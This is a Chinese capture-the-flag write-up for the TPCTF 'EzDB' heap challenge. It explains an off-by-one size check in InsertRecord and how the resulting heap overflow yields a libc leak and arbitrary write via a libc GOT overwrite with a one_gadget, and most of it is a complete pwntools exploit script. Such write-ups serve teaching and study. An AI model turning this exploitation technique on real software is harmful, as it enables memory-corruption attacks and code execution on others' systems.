[TPCTF] EzDB详解

程序分析

第一眼菜单堆题，但程序本身实现了一个数据结构：表结构（page）储存Record

逆向出的page结构体如下，记录分配的内存以及record记录。然后堆内还存在一个数据结构records。两个结构之间的关系如图（请忽略我粗劣的画工）

1. struct TablePage
2. {
3.   void *mem; // 分配的堆内存地址
4.   void *records_end; // record结尾，在GetSlotNum函数中用于计算有多少个record
5.   void *mem_offset; // 空闲内存，每次申请record从堆内存尾部分割
6.   void *records_ptr; // record开始，在EditRecord函数用于索引到指定record
7. };
8. struct recordInHeap
9. {
10.   uint16_t offset; // record内容在堆内的偏移
11.   uint16_t size; // record的大小
12. };

复制代码

这里为什么要专门要创建一个recordInHeap结构体呢，主要是和菜单选项里的Record结构区分开来
堆内的records数组是向高地址生长，而内容则是向低地址生长

漏洞在于InsertRecord时，对堆内的剩余空间计算存在问题
page->mem_offset -  page->records_end + 1 < Size + 4，我们只要令 申请的size +4= 剩余空间  + 1，就存在一字节的溢出。

然后memcpy复制的起始地址是page->mem_offset - Size，覆盖的是recordInHeap的size段的高位，接下来我们就可以进行愉快的堆溢出啦
之后就是常规的堆利用了，有很多利用思路，这里我选择劫持libc.got
起首leak出libc地址，然后通过溢出劫持TablePage结构体来实现任意写，修改libc的got.plt的strlen为one_gadget
由于程序打印menu时会调用puts函数，而puts函数内部又调用了strlen函数，触发ogg
exp

1. from pwn import *
2. import struct
4. def debug(c = 0):
5.     if(c):
6.         gdb.attach(p, c)
7.     else:
8.         gdb.attach(p)
9. def get_addr():
10.     return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
12. def get_sb():
13.     return libc.sym['system'], next(libc.search(b'/bin/sh\x00'))
15. sd = lambda data : p.send(data)
16. sa  = lambda text,data  :p.sendafter(text, data)
17. sl  = lambda data   :p.sendline(data)
18. sla = lambda text,data  :p.sendlineafter(text, data)
19. rc   = lambda num=4096   :p.recv(num)
20. ru  = lambda text   :p.recvuntil(text)
21. rl  = lambda         :p.recvline()
22. pr = lambda num=4096 :print(p.recv(num))
23. ia   = lambda        :p.interactive()
24. l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
25. l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
26. uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
27. uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
28. int16   = lambda data   :int(data,16)
29. lg = lambda s   :p.success('%s -> 0x%x' % (s, eval(s)))
30. lgn = lambda s, n   :p.success('%s -> 0x%x' % (s, n))
32. context(arch = "amd64",os = "linux",log_level = "debug")
33. #context.terminal = ['tmux','splitw','-h']
34. context.terminal = ['konsole', '-e', 'sh', '-c']
35. #context.terminal = ['gnome-terminal', '-e', 'sh', '-c']
36. file = "./pwn"
37. libc = "./libc.so.6"
39. p = process("./pwn")
40. elf = ELF(file)
41. libc = ELF(libc)
43. def add(idx):
44.     ru(">>>")
45.     sl(b"1")
46.     ru("Index:")
47.     sl(str(idx))
49. def edit(idx,sid,size,content):
50.     ru(">>>")
51.     sl(b"5")
52.     ru("Index:")
53.     sl(str(idx))
54.     ru("Slot ID:")
55.     sl(str(sid))
56.     ru("Varchar Length:")
57.     sl(str(size))
58.     ru("Varchar:")
59.     sd(content)
61. def insert(idx,size,content):
62.     ru(">>>")
63.     sl(b"3")
64.     ru("Index:")
65.     sl(str(idx))
66.     ru("Length:")
67.     sl(str(size))
68.     ru("Varchar:")
69.     sd(content)
71. def show(idx,sid):
72.     ru(">>>")
73.     sl(b"4")
74.     ru("Index:")
75.     sl(str(idx))
76.     ru("Slot ID:")
77.     sl(str(sid))
79. def delete(idx):
80.     ru(">>>")
81.     sl(b"2")
82.     ru("Index:")
83.     sl(str(idx))
85. for i in range(10):
86.     add(i)
88. for i in range(9, 1, -1):
89.     delete(i)
91. payload = p8(0x5).ljust(0x401 - 4, b'a')
92. insert(1, 0x401-4, payload)
93. show(1, 0)
94. ru(p64(0x3d1))
95. libcbase = uu64() - 0x21ace0
96. libc.address = libcbase
97. libc_got = libc.got["malloc"] + 0xa8
99. insert(0, 0x401-4, payload)
100. oggs = [0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43]
101. payload = p8(0x5).ljust(0x401 - 4, b'a') + flat(0, 0x31, libc_got-4, libc_got-4, libc_got+8, libc_got-4)
102. edit(0, 0, len(payload) ,payload)
103. lgn("libcbase", libcbase)
104. lgn("strlen got", libc_got)
105. debug()
106. pause()
107. insert(1, 8, p64(libcbase + oggs[1]))
109. ia()

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。